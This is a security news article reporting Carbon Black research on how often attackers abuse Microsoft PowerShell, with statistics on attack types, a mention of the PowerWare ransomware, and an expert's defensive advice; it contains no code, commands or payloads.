PowerShell Exploits Spotted in Over a Third of Attacks

Security experts are warning that Microsoft PowerShell attacks now represent a major enterprise security risk, accounting for 38% of incidents seen by endpoint security vendor Carbon Black and its partners.

PowerShell is a native task automation framework used by Windows to dynamically load and execute code without touching the file system. As such it represents a great way for malware authors to hide their presence while gaining access to endpoints – typically in a post-exploitation scenario, Carbon Black claimed.

The firm interviewed over 20 security partners including Rapid7 and Ernst & Young, analyzing the results of over 1,000 investigations last year to gain a comprehensive picture of PowerShell activity in its Unified Threat Research report.

While 38% had seen PowerShell used in attacks, a worrying 31% claimed their clients had received no security alerts before they looked into whether the Microsoft tool had been exploited.

It’s used in a variety of attacks, whether designed to steal sensitive IP (17%), customer PII (15%), financial data (18%) or to disrupt services (15%).

And while 13% of the time PowerShell was used in targeted attacks, the vast majority of the time (87%) it’s being abused in commodity attacks such as click-fraud, fake AV, ransomware and other opportunistic malware, the study found.

The report explained the following:

“One thing is clear: PowerShell is not used in any one specific type of attack. While techniques varied (from passing binaries encoded on command lines, to downloading scripts from compromised websites, to interactive sessions where an attacker used reverse command shells to execute individual commands) the types of attacks were even more varied. We saw PowerShell used for click fraud, banking Trojans, password sniffing, and more targeted credential and IP theft.”

Actual malicious behavior associated with PowerShell attacks can range from lateral movement inside an organization (47%) to credential theft (47%), privilege escalation (37%), data exfiltration (26%), establishing persistence (47%), system disruption (26%) and command and control activity (61%).

Just last month, Carbon Black alerted customers about a new form of ransomware written in PowerShell. The so-called 'PowerWare' targeted users via a malicious Microsoft Word document.

Carbon Black chief security strategist, Ben Johnson, claimed that mitigating the risk of PowerShell attacks can be difficult as blocking them outright is often not an option.

“Setting standards around how PowerShell can be used – for example, by establishing policies that ensure only signed scripts are allowed to run – puts security teams in a much stronger position to identify an intrusion when it happens, while still enabling functionality,” he told Infosecurity.

“For example, by looking at the command line, they should be able to spot any tell-tale signs that a script has been run out of turn. Or by checking Windows Registry they can identify unauthorised changes to policies that indicate an attack has been launched.”

Also an option is checking whether you can upgrade to version 3.0, which offers improved logging and security features, Johnson added.

What’s Hot on Infosecurity Magazine?